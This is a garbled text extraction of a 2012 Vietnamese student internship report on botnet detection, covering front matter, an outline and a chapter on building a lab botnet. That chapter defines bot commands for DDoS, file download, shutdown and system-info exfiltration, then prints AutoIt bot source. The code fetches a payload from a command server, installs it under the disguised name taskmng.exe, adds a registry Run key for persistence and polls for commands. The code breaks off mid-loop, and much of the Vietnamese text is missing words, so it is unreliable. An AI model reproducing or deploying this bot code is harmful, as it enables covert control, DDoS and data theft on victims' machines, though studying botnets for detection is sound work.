khảo sát kỹ thuật phát Botnet NG UY ỄN QU AN G NH ẬT MS SV: 408 170 089 Tên Đề tài KH ẢO SÁ T CÁ C KỸ TH UẬ T PH ÁT HIỆ N BO TN ET Tên Lớp TẬP ĐỒN BƯU CHÍNH VIỄN THƠNG VIỆT NAM HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG BÁO CÁO THỰC TẬP TỐT NGHIỆP ĐẠI HỌC Đề tài: “ KHẢO SÁT CÁC KỸ THUẬT PHÁT HIỆN BOTNET” Người hướng dẫn : TH.S LÊ PHÚC Sinh viên thực : NGUYỄN QUANG NHẬT Mã số sinh viên : 408170089 Lớp Khoá Hệ : : D08TH_MMT&TT : ĐẠI HỌC CHÍNH QUY TP.HCM, tháng 7/2012 2008-2013 khảo sát kỹ thuật phát Botnet TẬP ĐOÀN BƯU CHÍNH VIỄN THƠNG VIỆT NAM HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG BÁO CÁO THỰC TẬP TỐT NGHIỆP ĐẠI HỌC Đề tài: “ KHẢO SÁT CÁC KỸ THUẬT PHÁT HIỆN BOTNET” Người hướng dẫn : Sinh viên thực : TH.S LÊ PHÚC NGUYỄN QUANG NHẬT Mã số sinh viên Lớp Khoá Hệ : : : D08TH_MMT&TT : 2008-1013 ĐẠI HỌC CHÍNH QUY TP.HCM, tháng 7/2012 408170089 khảo sát kỹ thuật phát Botnet CỘNG HÒA Xà HỘI CHỦ NGHĨA VIỆT NAM Độc lập- Tự do- Hạnh phúc TP Hồ Chí Minh, ngày 29 tháng năm 2012 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN THỰC TẬP TỐT NGHIỆP ĐẠI HỌC Tên đề tài: Khảo sát kỹ thuật phát Botnet Sinh viên: Nguyễn Quang Nhật Lớp: D08TH_MMT&TT Giáo viên hướng dẫn: Th.S Lê Phúc Nơi công tác: Công ty TNHH somotNet NỘI DUNG NHẬN XÉT Đánh giá chung: ………………………………………………………………………………………… ………………………………………………………………………………………… Đánh giá chi tiết: ………………………………………………………………………………………… ………………………………………………………………………………………… ………………………………………………………………………………………… ………………………………………………………………………………………… Nhận xét tinh thần, thái độ làm việc: ………………………………………………………………………………………… ………………………………………………………………………………………… Kết luận: ………………………………………………………………………………………… ………………………………………………………………………………………… Điểm hướng dẫn (): GIẢNG VIÊN HƯỚNG DẪN (Ký, ghi rõ họ tên) khảo sát kỹ thuật phát Botnet khảo sát kỹ thuật phát Botnet LỜI MỞ ĐẦU Cùng với phát triển cơng nghệ thơng tin, cơng nghệ mạng máy tính phát triển mạng internet ngày phát triển đa dạng phong phú Các dịch vụ mạng thâm nhập vào hầu hết lĩnh vực đời sống xã hội Các thông tin Internet đa dạng nội dung hình thức, có nhiều thơng tin cần bảo mật cao tính kinh tế, tính xác tính tin cậy Bên cạnh đó, hình thức phá hoại mạng trở nên tinh vi phức tạp Do hệ thống, nhiệm vụ bảo mật đặt cho người quản trị mạng quan trọng cần thiết Xuất phát từ thực tế đó, tìm hiểu cách cơng phổ biến phịng chống loại cơng Chính vậy, thơng qua việc nghiên cứu botnet kỹ thuật phát hiên botnet, mong muốn góp phần nhỏ vào việc nghiên cứu tìm hiểu vấn đề an ninh mạng giúp cho việc học tập nghiên cứu Lý chọn đề tài Trong năm gần đây, Việt Nam ngày phát triển mặt công nghệ thông tin Các công sử dụng Botnet ngày trở nên phổ biến với nhiều thủ đoạn hình thức cơng Chính vậy, thiệt hại Botnet gây trở thành mối lo với nhà chức trách nói riêng cộng động người sử dụng Internet nói chung Ngay năm kỷ 21, với đời nhiều mạng Botnet năm, nhiều nghiên cứu nhằm làm giảm thiệt hai Botnet gây đề xuất triển khai.vì lý an tồn bảo mật ln vấn đề nan giải cho người, doanh nghiệp, công ty Vì ta tìm hiểu botnet kỹ thuật botnet Mục tiêu Giúp hiểu botnet cách thức hoạt động nó, mối đe dọa vấn đề an tồn thơng tin làm việc hàng ngày, hiểu rõ kỹ thuật công botnet khảo sát kỹ thuật phát Botnet LỜI CẢM ƠN Lời em xin chân thành cảm ơn đến quý Thầy, Cô trường Học viện Cơng nghệ Bưu Viễn thơng Cơ sở Thành phố Hồ Chí Minh, người trực tiếp giảng dạy, truyền đạt kiến thức bổ ích cho em, tảng bản, hành trang vô quý giá, bước cho em bước vào nghiệp sau tương lai Đặc biệt thầy Lê Phúc, thầy cho em nhiều kiến thức cảm ơn thầy tận tình, qua tâm, giúp đỡ em tháng vừa qua, giải đáp thắc mắc trình thực tập nhờ đó, em hồn thành báo cáo thực tập Bên cạnh đó, em xin cảm ơn chân thành tới trưởng phòng, anh chị Công ty TNHH somotNET tạo hội giúp em tìm hiểu rõ mơi trường làm việc thực tế công ty mà ngồi ghế nhà trường em chưa biết Trong trình thực tập làm báo cáo, chưa có kinh nghiệp thực tế, dựa vào lý thuyết học với thời gian thực tập hạn hẹp nên báo cáo chắn không tránh khỏi sai sót Kính mong nhận góp ý, nhận xét từ phía q Thầy, Cơ để kiến thực em ngày hoàn thiện rút kinh nghiệm bổ ích áp dụng vào thực tiễn cách hiệu tương lai Kính chúc người ln vui vẻ, hạnh phúc, dồi sức khỏe thành công công việc Em xin chân thành cảm ơn! Sinh viên thực Nguyễn Quang Nhật khảo sát kỹ thuật phát Botnet NỘI DUNG BÁO CÁO CHƯƠNG 1.GIỚI THIỆU: o Tổng quan tình hình an ninh mạng năm gần Các kiểu công phổ biến mạng, đồng thời nêu lên mục đích, nội dung ý nghĩa báo cáo o Các kiểu công mạng: Trình bày kiểu cơng thơng dụng mạng như: Sniff, lừa đảo trực tuyến (Phishing), SQL Injection, công từ chối dịch vụ Các phương pháp phịng chống kiểu cơng CHƯƠNG 2.TỔNG QUAN VỀ BOTNET : Định nghĩa botnet, mô hình botnet thường gặp, loại botnet phổ biến CHƯƠNG CÁC HỆ THỐNG PHÒNG CHỐNG BOTNET: lý thuyết hệ thống phòng chống phát Botnet CHƯƠNG THIẾT LẬP BOTNET DÙNG CÔNG CỤ AUTOIT: Giới thiệu công cụ viết botnet, code botnet, kết kết luận… khảo sát kỹ thuật phát Botnet DANH MỤC HÌNH VẼ STT 10 11 12 TÊN HÌNH VẼ Hình 1.1: loại virus điển hình 2011 Hình 1.2: thống kê vụ cơng vào website năm 2011 Hình 2.1: Mơ hình botnet thường gặp Hình 2.2: Mơ Hình Tập Trung Hình 2.3: Mơ Hình Phân Tán Hình 2.4: Sử Dụng Botnet Tấn Cơng Ddos Hình 2.5: Phát Tán Thư Rác Hình 3.1: Hệ thống HIDS Hình 3.2: Hệ thống NIDS Hình 3.3 : Ví dụ honeypot Hình 3.4 : Các thành phần hệ thống Honeypot sử dụng Hình 3.5: Lược đồ bước thực thi hệ thống Tracking Botnet tài liệu 13 14 15 16 17 18 19 Hình 4.1: Máy tính windows xp thứ Hình 4.2: Máy tính windows xp thứ Hình 4.3: Bảng phân giải địa IP www.chuyentq.com Hình 4.4: Các gói tin máy tính Windows XP gửi nhận Hình 4.5: Các gói tin máy tính Windows XP gửi nhận Hình 4.7: Thơng tin máy tính Windows XP Hình 4.8: Thơng tin máy tính Windows XP khảo sát kỹ thuật phát Botnet KÍ HIỆU CÁC CỤM TỪ VIẾT TẮT DDOS: Distributed Denial of Service C&C Server : Command & Control Server HTTP : HyperText Transfer Protocol IRC : Internet Relay Chat KOS : Kill Operating System BSOD : Blue Screen of Death RAT : The Remote Access Trojan P2P : peer two peer FTTP : Fiber To The Premises FTP : File Transfer Protocol TFTP : Trivial File Transfer Protocol kể USB : Universal Serial Bus IDS: Intrusion Detection System HIDS Host Based IDS NIDS Network Base IDS IPS : Internet Protocol Security SMTP: Simple Mail Transfer Protocol TCP : Transmission Control Protocol UDP : User Datagram Protocol Malware: Malicious – Software công từ chối dịch vụ phân tán giao thực truyền tải siêu văn phần mềm liên lạc cấp tốc phá hủy hệ điều hành lỗi hình xanh Windows điều khiển truy cập trojan mạng ngang hàng cáp quang giao thực truyền tập tin giao thực truyền tập tin không đáng hệ thống phát xâm nhập giao thức truyền tải thư tín đơn giản Giao thức điều khiển truyền vận Phần mềm nguy hiểm khảo sát kỹ thuật phát Botnet Contents khảo sát kỹ thuật phát Botnet • • • • • máy Windows server 2003 cài đặt Web server.có địa IP 172.16.1.1/16 Trong có file : taptenh.txt update.exe (đây bot để cẩn cập nhật cho máy người dùng tải ) Máy windown Xp botclient chịu điều khiển botherder có địa IP là: 172.16.1.2/16 172.16.1.3/16 ngồi máy cịn có thêm card mạng Bridged để truy cập mạng internet Ở không đề cập đến chuyện làm để đưa bot đến máy tính người dùng tơi đề cập phần Tôi cho người thấy khả bot thực máy tính người dụng chức đơn giản điều khiển qua câu lệnh Các chức đơn giản mà cài đặt bot là: • bắt máy tính người dùng mở chương trinh • cơng DDOS trang web • tải file máy tính • tắt chương trình chạy • cho shutdown máy tính người dùng • người dụng sử dụng yahoo, gửi tin nhắn đến bạn bè thơng qua yahoo người sử dụng • lấy thơng tin máy tính người sử dụng hệ điều hành, user, ip…thơng qua yahoo • lấy processlist người dùng thơng qua yahoo • khỏi động lại bot hoạt động bình thường Trên vài ý tưỡng mà tơi nghĩ Cịn có nhiều chức mà bot thực thực tốt hay không dựa vào kỹ ý tưỡng “hacker”… Thực câu lệnh Ý tưỡng dùng ký tự đặc biệt ~, !,@, #, $, %,^ ,&… bot nhận biết lệnh thực thi câu lệnh đó.sau câu lệnh cú pháp câu lệnh: Câu lệnh mở chương trình bât kỳ, cú pháp : ~“chương trình muốn mở” Ví dụ: để mở notepad ta có câu lệnh: ~notepad.exe Câu lệnh DDOS trang web bất kỳ, cú pháp : !”tên trang web” Ví dụ: cơng đến trang www.quangnhat.com ta có câu lênh: ! www.quangnhat.com Câu lệnh tải file máy tính, cú pháp: @_”đường dẫn”_”nơi lưu” Vú dụ: tải chương trình về: @ www.quangnhat.com/vd1.exe c:// Câu lệnh tắt máy ta cần cú pháp: $ Câu lệnh gửi thống báo qua yahoo, cú pháp: %”câu thông báo” Trang 46 khảo sát kỹ thuật phát Botnet Ví dụ:câu thơng bào nguyen quang nhat : %nguyen quang nhat • Lệnh gửi thống tinh máy tính, cú pháp : ^ • Lệnh gửi processlist máy tính, cú pháp: & 4.3 Code botnet #include #NoTrayIcon $web = "http://172.16.1.1" $txt = "http://172.16.1.1/taplenh.txt" $key = "" sleep(10000) If Not FileExists(@WindowsDir & "\taskmng.exe") Then InetGet ($web& "/update.exe", @WindowsDir & "\taskmng.exe", 0, 1) Sleep(5000) EndIf ; Ghi Khoa Registry ;RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1") ;RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVers ion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0") ;RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVers ion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer sion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe") While (1) $con = _INetGetSource($txt) If $key $con Then ; Phan tich va thuc hien lenh If StringInStr($con, "~", 1) Then; lenh mo chuong trinh $cmd = StringSplit($con, "~") ;MsgBox(1,"nhat",$cmd[2],7) Run($cmd[2]) $key = $con ElseIf StringInStr($con, "!", 1) then; lenh ddos $msg = StringSplit($con,"!") $i =0 while ($i